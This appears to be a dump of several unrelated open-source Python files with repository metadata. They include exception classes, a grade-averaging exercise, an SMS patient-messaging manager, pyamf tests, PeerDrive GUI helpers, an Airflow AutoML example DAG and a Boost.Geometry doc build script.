super(CompoundPiUndefinedServers, self).__init__(
'transaction with undefined servers: %s' %
','.join(str(addr) for addr in addresses))
class CompoundPiRedefinedServer(CompoundPiClientError):
"Exception raised when a server is added to the list twice"
def __init__(self, address):
super(CompoundPiRedefinedServer, self).__init__(
'server already defined: %s' % address)
class CompoundPiInvalidResponse(CompoundPiServerError):
"Exception raised when a server returns an unexpected response"
def __init__(self, address):
super(CompoundPiInvalidResponse, self).__init__(
address, 'invalid response')
class CompoundPiMissingResponse(CompoundPiServerError):
"Exception raised when a server fails to return a response"
def __init__(self, address):
super(CompoundPiMissingResponse, self).__init__(
address, 'no response')
class CompoundPiSendTimeout(CompoundPiServerError):
"Exception raised when a server fails to open a connection for SEND"
def __init__(self, address):
super(CompoundPiSendTimeout, self).__init__(
address, 'timed out waiting for SEND connection')
class CompoundPiSendTruncated(CompoundPiServerError):
"Exception raised when a server doesn't send enough data for SEND"
def __init__(self, address):
super(CompoundPiSendTruncated, self).__init__(
address, 'unexpected EOF during SEND')
| gpl-2.0 | -8,593,408,775,321,409,000 | 32.497674 | 84 | 0.693557 | false |
xbash/LabUNAB | 11_diccionarios/01_diccionario.py | 1 | 1078 | #-------------------------------------------------------------------------------
# Name: 01_diccionario
# Purpose:
#
# Author: jsepulveda
#
# Created: 18-10-2016
# Copyright: (c) jsepulveda 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
alumnos = [{
"nombre":"Juan",
"fecha_nac":(1992,7,2),
"familia":{"papa":"Pedro","mama":"Luisa"},
"cursos":[
{"sigla":"ING133","notas":[7,6,5.2]},
{"sigla":"FIS120","notas":[6,4,3]}]
},{
"nombre":"Jorge",
"fecha_nac":(1983,7,2),
"familia":{"papa":"Mario","mama":"Maria"},
"cursos":[
{"sigla":"INF320","notas":[7,6,5.2]},
{"sigla":"MAT120","notas":[6,4,3]}]
}]
print(alumnos[0]["cursos"][1]["notas"][1])
for alumno in alumnos:
print("")
print("Notas de "+alumno["nombre"])
for curso in alumno["cursos"]:
suma = 0
for nota in curso["notas"]:
suma += nota
promedio = round(suma/len(curso["notas"]),1)
print("curso "+curso["sigla"]+": "+str(promedio)) | gpl-3.0 | 4,461,117,359,344,268,300 | 28 | 80 | 0.447124 | false |
jawrainey/sris | sris/manager.py | 1 | 7789 | from sris import db, models
from messenger import Messenger
from service import SMSService
from datetime import datetime
class Manager:
"""
The middle-man of interaction between messenger and the SMS service.
"""
def __init__(self):
self.config = self.__load_config_file()
self.messenger = Messenger(self.config)
self.sms_service = SMSService()
def send_initial_greeting(self):
"""
Sends the initial SMS to new* patients at a pre-defined client time.
*New patients are those that have recently been added
to the clients database, which the service does not know.
Note: this is REQUIRED otherwise 'respond' & other services do not
function as database errors are thrown (understandably).
"""
from datetime import datetime
current_time = str(datetime.now().time())[0:5]
# Send the message to new patients at the defined time.
if current_time == self.config['initialQuestion']['time']:
for number in self.__new_patients():
message = self.messenger.initial_message()
self.sms_service.send(number, message)
self.__create_new_patient(number)
self.__save_message(number, message, 'sent')
def respond(self, patient_response):
"""
Respond to new SMS when it is received via a POST request.
Args:
patient_message (dict): Contains the number, and message sent to
the service by a patient.
Returns:
response (XML): twilio formatted response.
"""
number = patient_response['number']
patient_message = patient_response['message']
# Generate a reflective summary based on the patient's response.
summary = self.messenger.summary(patient_message)
# TODO: Fix this with the system set time (i.e. UTC)
midnight = int(datetime.today().strftime("%s")) - 24*60*60
# The number of questions sent since last night.
_questions = db.session.query(models.Message).filter(
models.Message.mobile == number,
models.Message.status == 'sent',
models.Message.timestamp >= midnight).all()
all_sent = [item.message for item in _questions]
# The number of OEQ sent since last night.
num_oeq = len([i for i in self.config['questions'] if i in all_sent])
print 'Number OEQ sent since last night was: %s' % str(num_oeq)
response = None
# Do not send a response if initial daily conversation not started.
if num_oeq >= 1:
print 'The last sms sent was: %s' % all_sent[-1]
if all_sent[-1] in self.config['questions']:
print 'Last message sent was an OEQ. Sending a RS to patient.'
response = summary
else:
print 'Inside the else..'
if (num_oeq >= int(self.config['limit'])): # True: OEQ >= LIMIT
print 'Inside the else... in the if...'
if self.config['endQuestion'] not in all_sent:
print 'Sending the conversation closer as limit met.'
response = self.config['endQuestion']
else:
print 'Message received was response to a RS. Sending OEQ.'
response = self.__select_question(number)
if response:
self.__save_message(number, patient_message, 'received')
self.__save_message(number, response, 'sent')
print 'The response (%s) has been saved to the database.' % response
return self.sms_service.reply(response)
else:
print 'No response was created.'
return '' # Prevents a 500 error code returned to POST.
def send_initial_question_to_all(self):
"""
Sends a question to all patients at a pre-defined day and time.
"""
known_patients = [item.mobile for item in
db.session.query(models.Patient.mobile).all()]
from datetime import datetime
print "Checking to see if open-ended question should be sent."
isDay = datetime.now().strftime("%A") in self.config["daysToSend"]
isTime = str(datetime.now().time())[0:5] == self.config["sendTime"]
if isDay and isTime:
for number in known_patients:
message = self.__select_question(number)
print "OEQ (%s) to patient (%s)." % (message, number)
self.__save_message(number, message, 'sent')
self.sms_service.send(number, message)
def __select_question(self, number):
"""
Select a client-defined open-ended question that has not been previously
selected at random. If all have been sent then select one at random.
Args:
number (str): The mobile number of the patient.
Returns:
str: An open-ended question to ask the patient.
"""
questions = self.config['questions']
sent_questions = [item.message for item in db.session.query(
models.Message).filter(models.Message.mobile == number).all()]
unsent_questions = list(set(questions).difference(sent_questions))
# TODO: Select most important question based on client's situation
import random
if unsent_questions:
print "Sending a message that HAS NOT been previously sent."
message = random.choice(unsent_questions)
else:
print "Sending a message that HAS been previously sent."
message = random.choice(questions)
return message
def __load_config_file(self):
"""
Stores the contents of the client-defined config file to a json object.
Returns:
json: A json object of the user-defined config file.
"""
import json
from flask import current_app
config_file = current_app.config['PROJECT_ROOT'] + '/sris/config/' + \
current_app.config['CLIENT_NAME'] + '.json'
with open(config_file) as json_settings:
return json.load(json_settings)
def __new_patients(self):
"""
Checks to see if any new patients have been added to the client DB.
Returns:
list: Mobile numbers the client knows & the service does not.
"""
# ALL numbers obtained from the client.
client_numbers = db.session.query(models.Patient.mobile).all()
# The numbers the service has to date.
service_numbers = db.session.query(models.User.mobile).all()
# The numbers the client has, but the service does not.
numbers = set(client_numbers).difference(service_numbers)
print 'There was %s new patients' % str(len(numbers))
# Convert SQLAlchemy KeyedTuple to ordinary list.
return [item.mobile for item in numbers]
def __create_new_patient(self, number):
"""
Adds the patient to the service database.
Args:
number (str): The mobile number of the patient.
"""
db.session.add(models.User(mobile=number))
db.session.commit()
def __save_message(self, number, message, status):
"""
Save the SMS message (sent or received) to the service database.
Args:
number (str): The mobile number of the patient.
message (str): The SMS message content.
status (str): The status of the message, e.g. 'sent' or 'received'.
"""
db.session.add(models.Message(mobile=number, message=message,
status=status))
db.session.commit()
| mit | -7,210,275,371,339,341,000 | 40.430851 | 80 | 0.594813 | false |
johnmee/plugin.video.catchuptv.au.ten | resources/lib/pyamf/tests/test_adapters.py | 32 | 1661 | # Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Tests for the adapters module.
@since: 0.3.1
"""
import os
import sys
from pyamf import adapters
from pyamf.tests import util
from pyamf.tests.test_imports import ImportsTestCase
class AdapterHelperTestCase(ImportsTestCase):
def setUp(self):
ImportsTestCase.setUp(self)
self.old_env = os.environ.copy()
self.mods = sys.modules.copy()
self.path = os.path.join(os.path.dirname(__file__), 'imports')
sys.path.append(self.path)
def tearDown(self):
ImportsTestCase.tearDown(self)
util.replace_dict(os.environ, self.old_env)
util.replace_dict(sys.modules, self.mods)
sys.path.remove(self.path)
def test_basic(self):
class Foo(object):
def __call__(self, *args, **kwargs):
pass
def bar(*args, **kargs):
pass
self.assertRaises(TypeError, adapters.register_adapter, 'foo', 1)
self.assertRaises(TypeError, adapters.register_adapter, 'foo', 'asdf')
adapters.register_adapter('foo', Foo())
adapters.register_adapter('foo', bar)
adapters.register_adapter('foo', lambda x: x)
def test_import(self):
self.imported = False
def x(mod):
self.imported = True
self.spam = mod
adapters.register_adapter('spam', x)
import spam
self.assertTrue(self.imported)
self.assertEqual(self.spam, spam)
def test_get_adapter(self):
from pyamf.adapters import _decimal
self.assertTrue(adapters.get_adapter('decimal') is _decimal)
| mit | 404,746,451,271,306,700 | 24.166667 | 78 | 0.624323 | false |
peerdrive/peerdrive | client/peerdrive/gui/utils.py | 1 | 1601 | # vim: set fileencoding=utf-8 :
#
# PeerDrive
# Copyright (C) 2011 Jan Klötzke <jan DOT kloetzke AT freenet DOT de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from PyQt4 import QtCore
import sys, subprocess
from ..connector import Connector
from ..registry import Registry
def showDocument(link, executable=None, referrer=None):
args = [str(link)]
if referrer:
args.append('--referrer')
args.append(str(referrer))
if not executable:
link.update()
rev = link.rev()
uti = Connector().stat(rev).type()
executable = Registry().getExecutables(uti)[0]
if executable:
if sys.platform == "win32":
subprocess.Popen([executable] + args, shell=True)
else:
executable = './' + executable
QtCore.QProcess.startDetached(executable, args, '.')
def showProperties(link):
args = [str(link)]
if sys.platform == "win32":
subprocess.Popen(['properties.py'] + args, shell=True)
else:
QtCore.QProcess.startDetached('./properties.py', args, '.')
| gpl-3.0 | -305,702,415,117,508,350 | 29.769231 | 71 | 0.72625 | false |
Acehaidrey/incubator-airflow | airflow/providers/google/cloud/example_dags/example_automl_nl_text_classification.py | 7 | 3351 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses Google AutoML services.
"""
import os
from airflow import models
from airflow.providers.google.cloud.hooks.automl import CloudAutoMLHook
from airflow.providers.google.cloud.operators.automl import (
AutoMLCreateDatasetOperator,
AutoMLDeleteDatasetOperator,
AutoMLDeleteModelOperator,
AutoMLImportDataOperator,
AutoMLTrainModelOperator,
)
from airflow.utils.dates import days_ago
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "your-project-id")
GCP_AUTOML_LOCATION = os.environ.get("GCP_AUTOML_LOCATION", "us-central1")
GCP_AUTOML_TEXT_CLS_BUCKET = os.environ.get("GCP_AUTOML_TEXT_CLS_BUCKET", "gs://")
# Example values
DATASET_ID = ""
# Example model
MODEL = {
"display_name": "auto_model_1",
"dataset_id": DATASET_ID,
"text_classification_model_metadata": {},
}
# Example dataset
DATASET = {
"display_name": "test_text_cls_dataset",
"text_classification_dataset_metadata": {"classification_type": "MULTICLASS"},
}
IMPORT_INPUT_CONFIG = {"gcs_source": {"input_uris": [GCP_AUTOML_TEXT_CLS_BUCKET]}}
extract_object_id = CloudAutoMLHook.extract_object_id
# Example DAG for AutoML Natural Language Text Classification
with models.DAG(
"example_automl_text_cls",
schedule_interval=None, # Override to match your needs
start_date=days_ago(1),
tags=['example'],
) as example_dag:
create_dataset_task = AutoMLCreateDatasetOperator(
task_id="create_dataset_task", dataset=DATASET, location=GCP_AUTOML_LOCATION
)
dataset_id = '{{ task_instance.xcom_pull("create_dataset_task", key="dataset_id") }}'
import_dataset_task = AutoMLImportDataOperator(
task_id="import_dataset_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
input_config=IMPORT_INPUT_CONFIG,
)
MODEL["dataset_id"] = dataset_id
create_model = AutoMLTrainModelOperator(task_id="create_model", model=MODEL, location=GCP_AUTOML_LOCATION)
model_id = "{{ task_instance.xcom_pull('create_model', key='model_id') }}"
delete_model_task = AutoMLDeleteModelOperator(
task_id="delete_model_task",
model_id=model_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
delete_datasets_task = AutoMLDeleteDatasetOperator(
task_id="delete_datasets_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
create_dataset_task >> import_dataset_task >> create_model >> delete_model_task >> delete_datasets_task
| apache-2.0 | -797,317,752,486,780,700 | 32.848485 | 110 | 0.716801 | false |
gnu3ra/SCC15HPCRepast | INSTALLATION/boost_1_54_0/libs/geometry/doc/make_qbk.py | 3 | 5284 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# ===========================================================================
# Copyright (c) 2007-2012 Barend Gehrels, Amsterdam, the Netherlands.
# Copyright (c) 2008-2012 Bruno Lalande, Paris, France.
# Copyright (c) 2009-2012 Mateusz Loskot ([email protected]), London, UK
#
# Use, modification and distribution is subject to the Boost Software License,
# Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# ============================================================================
import os, sys
os.chdir(os.path.dirname(sys.argv[0]))
if 'DOXYGEN' in os.environ:
doxygen_cmd = os.environ['DOXYGEN']
else:
doxygen_cmd = 'doxygen'
if 'DOXYGEN_XML2QBK' in os.environ:
doxygen_xml2qbk_cmd = os.environ['DOXYGEN_XML2QBK']
else:
doxygen_xml2qbk_cmd = 'doxygen_xml2qbk'
cmd = doxygen_xml2qbk_cmd
cmd = cmd + " --xml doxy/doxygen_output/xml/%s.xml"
cmd = cmd + " --start_include boost/geometry/"
cmd = cmd + " --convenience_header_path ../../../boost/geometry/"
cmd = cmd + " --convenience_headers geometry.hpp,geometries/geometries.hpp,multi/multi.hpp"
cmd = cmd + " --skip_namespace boost::geometry::"
cmd = cmd + " --copyright src/copyright_block.qbk"
cmd = cmd + " > generated/%s.qbk"
def call_doxygen():
os.chdir("doxy");
os.system(doxygen_cmd)
os.chdir("..")
def group_to_quickbook(section):
os.system(cmd % ("group__" + section.replace("_", "__"), section))
def model_to_quickbook(section):
os.system(cmd % ("classboost_1_1geometry_1_1model_1_1" + section.replace("_", "__"), section))
def model_to_quickbook2(classname, section):
os.system(cmd % ("classboost_1_1geometry_1_1model_1_1" + classname, section))
def struct_to_quickbook(section):
os.system(cmd % ("structboost_1_1geometry_1_1" + section.replace("_", "__"), section))
def class_to_quickbook(section):
os.system(cmd % ("classboost_1_1geometry_1_1" + section.replace("_", "__"), section))
def strategy_to_quickbook(section):
p = section.find("::")
ns = section[:p]
strategy = section[p+2:]
os.system(cmd % ("classboost_1_1geometry_1_1strategy_1_1"
+ ns.replace("_", "__") + "_1_1" + strategy.replace("_", "__"),
ns + "_" + strategy))
def cs_to_quickbook(section):
os.system(cmd % ("structboost_1_1geometry_1_1cs_1_1" + section.replace("_", "__"), section))
call_doxygen()
algorithms = ["append", "assign", "make", "clear"
, "area", "buffer", "centroid", "convert", "correct", "covered_by"
, "convex_hull", "difference", "disjoint", "distance"
, "envelope", "equals", "expand", "for_each", "intersection", "intersects"
, "length", "num_geometries", "num_interior_rings", "num_points"
, "overlaps", "perimeter", "reverse", "simplify", "sym_difference"
, "touches", "transform", "union", "unique", "within"]
access_functions = ["get", "set", "exterior_ring", "interior_rings"
, "num_points", "num_interior_rings", "num_geometries"]
coordinate_systems = ["cartesian", "geographic", "polar", "spherical", "spherical_equatorial"]
core = ["closure", "coordinate_system", "coordinate_type", "cs_tag"
, "dimension", "exception", "interior_type"
, "degree", "radian"
, "is_radian", "point_order"
, "point_type", "ring_type", "tag", "tag_cast" ]
exceptions = ["exception", "centroid_exception"];
iterators = ["circular_iterator", "closing_iterator"
, "ever_circling_iterator"]
models = ["point", "linestring", "box"
, "polygon", "segment", "ring"
, "multi_linestring", "multi_point", "multi_polygon", "referring_segment"]
strategies = ["distance::pythagoras", "distance::haversine"
, "distance::cross_track", "distance::projected_point"
, "within::winding", "within::franklin", "within::crossings_multiply"
, "area::surveyor", "area::huiller"
, "centroid::bashein_detmer", "centroid::average"
, "convex_hull::graham_andrew"
, "simplify::douglas_peucker"
, "side::side_by_triangle", "side::side_by_cross_track", "side::spherical_side_formula"
, "transform::inverse_transformer", "transform::map_transformer"
, "transform::rotate_transformer", "transform::scale_transformer"
, "transform::translate_transformer", "transform::ublas_transformer"
]
views = ["box_view", "segment_view"
, "closeable_view", "reversible_view", "identity_view"]
for i in algorithms:
group_to_quickbook(i)
for i in access_functions:
group_to_quickbook(i)
for i in coordinate_systems:
cs_to_quickbook(i)
for i in core:
struct_to_quickbook(i)
for i in exceptions:
class_to_quickbook(i)
for i in iterators:
struct_to_quickbook(i)
for i in models:
model_to_quickbook(i)
for i in strategies:
strategy_to_quickbook(i)
for i in views:
struct_to_quickbook(i)
model_to_quickbook2("d2_1_1point__xy", "point_xy")
group_to_quickbook("arithmetic")
group_to_quickbook("enum")
group_to_quickbook("register")
group_to_quickbook("svg")
class_to_quickbook("svg_mapper")
group_to_quickbook("wkt")
os.chdir("index")
execfile("make_qbk.py")
os.chdir("..")
# Use either bjam or b2 or ../../../b2 (the last should be done on Release branch)
os.system("bjam")
| bsd-3-clause | -2,682,349,740,340,878,000 | 32.232704 | 98 | 0.631529 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.